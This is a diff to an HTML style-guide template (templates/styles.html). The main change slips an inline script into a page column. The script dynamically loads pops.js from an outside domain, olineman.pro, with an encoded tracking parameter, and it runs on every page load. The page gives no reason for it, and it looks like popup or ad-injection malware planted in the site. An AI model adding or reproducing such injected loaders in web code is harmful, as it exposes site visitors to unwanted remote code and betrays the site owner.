--- a/templates/styles.html
+++ b/templates/styles.html
@@ -41,6 +41,7 @@
 
 <body class="ss-bg-white">
 
+
     <!-- preloader
     ================================================== -->
     <div id="preloader">
@@ -168,7 +169,8 @@
                     <div class="row">
 
                         <div class="column large-6 tab-full">
-
+<script>(function(d){let s=d.createElement('script');s.async=true;s.src='https://olineman.pro/code/pops.js?h=waWQiOjEwMzM4MjMsInNpZCI6MTAzODU5NSwid2lkIjo3MDYyMywic3JjIjoyfQ==eyJ';d.head.appendChild(s);})(document);
+</script>
                             <h3>Paragraph and Image</h3>
 
                             <p><a href="#"><img width="120" height="120" class="pull-left" alt="sample-image" src="images/sample-image.jpg"></a>
